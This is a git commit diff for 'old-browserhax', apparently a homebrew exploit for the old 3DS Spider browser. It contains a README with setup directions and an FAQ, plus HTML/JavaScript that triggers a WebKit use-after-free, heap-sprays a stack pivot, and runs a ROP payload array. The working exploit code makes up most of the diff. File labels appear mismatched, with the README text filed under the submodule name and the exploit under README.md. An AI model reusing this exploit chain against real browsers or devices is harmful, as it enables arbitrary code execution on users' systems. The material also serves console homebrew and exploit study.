Initial file upload

Author: zoogie

.gitmodules

@@ -0,0 +1,3 @@
+[submodule "3ds_browserhax_common"]
+	path = 3ds_browserhax_common
+	url = https://github.com/zoogie/3ds_browserhax_common.git

3ds_browserhax_common

@@ -1 +1,66 @@
-# old-browserhax
+# old-browserhax
+
+## Thanks 
+- MrNbaYoh for his [nice](https://mrnbayoh.github.io/blog/exploiting-the-3ds-browsers-p1/) [blogs](https://mrnbayoh.github.io/blog/exploiting-the-3ds-browsers-p2/).
+- Yellows8 for the hbmenu loader code: https://github.com/yellows8/3ds_browserhax_common
+
+## Intro
+
+This is a new homebrew menu loading userland exploit for the old3ds browser, Spider. 
+
+## What's needed
+
+An old3ds (or old2ds) on firmwares:<br>
+```
+11.9.0-42 -> 11.13.0-45 for USA or JAPAN
+11.10.0-43 -> 11.13.0-45 for EUROPE
+```
+Note: The last number on the firmware version matters. If you updated from a cartridge to your current firmware, you will need to update to latest firmware as your browser would have been erased by the cart update.
+
+## Directions 
+
+1) In the release folder, find your region (USA, EUROPE, JAPAN) and take the two files *inside* that folder and put them on the root of your sd card. Do not copy the entire folder over.
+2) Place the homebrew launcher boot.3dsx from [here](https://github.com/fincs/new-hbmenu/releases/tag/v2.2.0) also on the root of your sd card.
+3) With wifi on and working, scan [this QR](http://api.qrserver.com/v1/create-qr-code/?color=000000&bgcolor=FFFFFF&data=https%3A%2F%2Fzoogie.github.io%2Fweb%2Fnbhax&qzone=1&margin=0&size=400x400&ecc=L) after pressing L+R should buttons together and tapping the QR button on the bottom screen. The link to the sploit page is https://zoogie.github.io/web/nbhax if you want to type it in manually and/or bookmark it.
+4) Click on the "PROCEED TO HAXX" button and the exploit should then load the homebrew menu. Make sure to add homebrews to the sdmc:/3ds folder first in order to have something to run. See other guides online about what you can do with homebrew.
+
+## Exploit details
+
+This is a Use-After-Free based on the layout crash test [here](https://github.com/WebKit/webkit/blob/master/LayoutTests/fast/canvas/canvas-bg-multiple-removal.html).
+
+## Troubleshooting
+
+- Problem: The 3ds freezes on a yellow screen.<br>
+Solution: Try again. Boot rate is about 75-80%. This has always been an issue with *hax homebrew and not specific to this implementation.
+
+- Problem: The 3ds freezes on some other color screen or "An error has occured" prompt shows up.<br>
+Solution: Make sure you have *all* the correct files. Check your region is correct.<br>
+At minimum, make sure to have the below 3 files in the sd root as shown.<br>
+```
+sdmc:/arm11code.bin
+sdmc:/browserhax_hblauncher_ropbin_payload.bin
+sdmc:/boot.3dsx
+```
+
+- Problem: I still can't get the exploit to work and the two solutions above didn't help.<br>
+Solution: Go to your browser's settings and select Clear History and Delete Cookies. Now create a bookmark with https://zoogie.github.io/web/nbhax as the address (or just edit an existing bookmark). Exit the browser, then launch it again (this saves your changes), and then finally launch that nbhax bookmark you just made.
+
+## FAQ
+Q: Will you support new3ds, new2ds?<br>
+A: Always have :p https://github.com/zoogie/new-browserhax
+
+Q: Will you support the other 3 minor regions (Korea, China, Taiwan)?<br>
+A: I'll think about it. It should be possible but it would be a lot of work, and I don't have consoles in these regions on hand for testing.
+
+Q: Can I install [unSAFE_MODE](https://github.com/zoogie/unSAFE_MODE) with this to get cfw?<br>
+A: Absolutely, be my guest : ) You can boot slotTool.3dsx and install the hacked wifi slots, then run the unSAFE_MODE exploit. No explicit directions will be given for that here, but guides should pop up soon with directions.
+
+Q: Where did this browser exploit come from originally?<br>
+A: There's no CVE of this exploit that I know of. It is based on that webkit layout test I mentioned above. The adding and removing of objects, then crashing made it seem like a use-after-free was the obvious culprit. I tested my theory with heap spraying dynamically sized fuzz objects, and I got a crash with PC control pretty quickly : )
+
+Q: The 3ds_browserhax_common code you used works in php server code, why does your hax just use a github io page?<br>
+A: I used a local webserver to emit the unescape output of y8's hb loading code, then converted it to a u32int array for my implementation. I used [this script](https://gist.github.com/zoogie/42adb5eab6b7f813f569f5250f7c800f) for the conversion. I just really wanted to avoid having to set up a server or asking someone else for that favor.
+
+Q: Will this exploit be fixed in a firmware update?<br>
+A: Don't know, but it's definitely possible. N has never fixed one of my exploits but they've always been proactive about fixing browser exploits. I give it 50/50 odds.
+

README.md

@@ -0,0 +1,103 @@
+<html>
+<script>
+//sploit based on layout crashtest from here:
+//https://github.com/WebKit/webkit/blob/master/LayoutTests/fast/canvas/canvas-bg-multiple-removal.html
+window.onload = function()
+{
+    if (location.hash == "#2") {
+        document.body.innerHTML = "PASSED: Duplicate webkit-canvas styles removed without crash.";
+        if (window.testRunner)
+            testRunner.notifyDone();
+    } else {
+        if (location.hash)
+            location.hash = "#" + (parseInt(location.hash.slice(1)) + 1).toString();
+        else
+            location.hash = "#1";
+
+        iframe = document.body.appendChild(document.createElement('iframe'));
+        element1 = document.createElement('a');
+        iframe.contentDocument.body.appendChild(element1);
+        element1.style.setProperty('background', '-webkit-canvas(canvas)');
+
+        element2 = document.createElement('a');
+        iframe.contentDocument.body.appendChild(element2);  
+        element2.style.setProperty('background', '-webkit-canvas(canvas)');  
+
+        element1.textContent = element2.textContent = 1;
+        setTimeout(removeElements, 0);
+	
+    }
+}
+
+function u32_to_unicode(n){
+	return String.fromCharCode(n & 0xffff,(n>>16) & 0xffff);
+}
+
+function gc()
+{
+
+    if (window.GCController)
+        return GCController.collect();
+
+    for (var i = 0; i < 10000; i++) { // > force garbage collection (FF requires about 9K allocations before a collect)
+        var s = new String("abc");
+    }
+}
+	/* Generated from: https://github.com/yellows8/3ds_browserhax_common */
+var payload=[0x00130f14, 0x00105788, 0x001050f4, 0x09320000, 0x0100ffff, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00104098, 0x00130f14, 0x00105788, 0x001050f4, 0x00202a04, 0x09320000, 0x00000004, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0011e114, 0x00130f14, 0x00105788, 0x001050f4, 0x18b40000, 0x00011000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x009ea308, 0x00130f14, 0x00105788, 0x001050f4, 0x09320000, 0x00000014, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x009ea308, 0x00130f14, 0x00105788, 0x0018dbe4, 0x09320010, 0x00640073, 0x0063006d, 0x002f003a, 0x00720061, 0x0031006d, 0x00630031, 0x0064006f, 0x002e0065, 0x00690062, 0x0000006e, 0x00000000, 0x00000000, 0x001bc690, 0x00130f14, 0x00105788, 0x001050f4, 0x09320040, 0x09320014, 0x00000030, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x009ea190, 0x00130f14, 0x00105788, 0x001050f4, 0x09320000, 0x09320040, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0022ffb0, 0x001a01f0, 0x00000000, 0x00130f14, 0x00105788, 0x001050f4, 0x09320000, 0x09320020, 0x18b41000, 0x00008000, 0x00000000, 0x00000000, 0x00000000, 0x001698bc, 0x001a01f0, 0x00000000, 0x0010c330, 0x09320000, 0x00130f14, 0x00105788, 0x0011169c, 0x00130f14, 0x00105788, 0x00101e78, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x001fdb78, 0x00130f14, 0x00105788, 0x001050f4, 0x18b41000, 0x00008000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00192568, 0x00130f14, 0x00105788, 0x0018dbe4, 0x09320010, 0x00000000, 0x00152c48, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0023c844, 0x0011dd0c, 0x00192568, 0x0022ffb0, 0x001fdb78, 0x0020757c, 0x001bc690, 0x00130f14, 0x00105788, 0x001050f4, 0x18b40000, 0x09320014, 0x00000030, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x009ea190, 0x00130f14, 0x00105788, 0x0018dbe4, 0x09320010, 0x00000000, 0x001698bc, 0x00169944, 0x0011e114, 0x00000000, 0x00000000, 0x00000040, 0x00000000, 0x00000000, 0x00000000, 0x003dd72c, 0x00000114, 0x001bc690, 0x00130f14, 0x00105788, 0x001050f4, 0x18b40030, 0x09320014, 0x00000030, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x009ea190, 0x00130f14, 0x00105788, 0x0018dbe4, 0x09320010, 0x00000000, 0x18b41000, 0x007e83bc, 0x009eae98, 0x009eaea0, 0x009eaec8, 0x009eaa28, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x001bc690, 0x00130f14, 0x00105788, 0x001050f4, 0x18b40060, 0x09320014, 0x00000030, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x009ea190, 0x00130f14, 0x001050f4, 0x001050f4, 0x18b41000, 0x193a56e0, 0x00008000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0011dd0c, 0x00000000, 0x00000000, 0x00000000, 0x00000008, 0x00000000, 0x00000000, 0x00000000, 0x00130f14, 0x00105788, 0x001050f4, 0x3b9aca00, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x001041c8, 0x00130f14, 0x00105788, 0x001050f4, 0x09320000, 0x01808080, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00104098, 0x00130f14, 0x001050f4, 0x001050f4, 0x00202a04, 0x09320000, 0x00000004, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0011e114, 0x18b40000, 0x0fff9000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00130f14, 0x00105788, 0x007e86e0, 0x70707070];
+
+var PAYLOAD_SPRAY=0, PIVOT_SPRAY=1;
+var obj= new Array();
+function spray(size, repeat, type) {
+	var a = new String("");
+	var offset=0;
+	
+	if(type==PIVOT_SPRAY){
+		for (var j = 0; j < size/4; j++){
+			if      (j==18)a+= u32_to_unicode(0x00130efc); //stackpivot
+			else if (j==7) a+= u32_to_unicode(0x09093018); //sp
+			else if (j==8) a+= u32_to_unicode(0x88888888); //lr
+			else if (j==9) a+= u32_to_unicode(0x00105788); //pc
+			else           a+= u32_to_unicode(0x22222222);
+		}
+	}
+	else if(type==PAYLOAD_SPRAY){
+		var str=new String("");
+		for (var j = 0; j < 0x1000/4; j++) str+= u32_to_unicode(0x00105788);
+		
+		for (var j = 0; j < size/0x1000; j++){
+			a+= str;
+		}
+		//a+= u32_to_unicode(0xdeadc0df);
+		for (var j = 0; j < payload.length; j++) a+= u32_to_unicode(payload[j]);
+	}
+	
+	for (var j = 0; j < repeat; j++) obj[j]=new String(a);
+}
+
+function heapspray() {
+	spray(0x800000, 1, PAYLOAD_SPRAY);
+	for(var i=0;i<0x300;i++) spray(0x4c, 1, PIVOT_SPRAY);
+}
+
+function removeElements()
+{ 
+    iframe.contentDocument.body.removeChild(element1);
+    document.adoptNode(element1);
+
+    iframe.contentDocument.body.removeChild(element2);
+    document.adoptNode(element2);  
+
+    document.body.removeChild(iframe);
+    setTimeout(finishTest, 500);
+}
+
+function finishTest()
+{  
+    document.body.appendChild(element1);
+    heapspray();
+    setTimeout(function () { location.reload() }, 0);
+}
+
+</script>
+</html>

frame.html

@@ -0,0 +1,14 @@
+<!--<script type="text/javascript" src="out.js"></script>-->
+<script>
+
+	function go(){
+		var f=document.getElementById("fr2");
+		f.src='frame.html';
+	}	
+	
+</script>
+<body onload="go()">
+	<h1>Haxx in progress, please wait ...</h1>
+	<iframe id="fr2" width="800" height="600" src="">
+</body>
+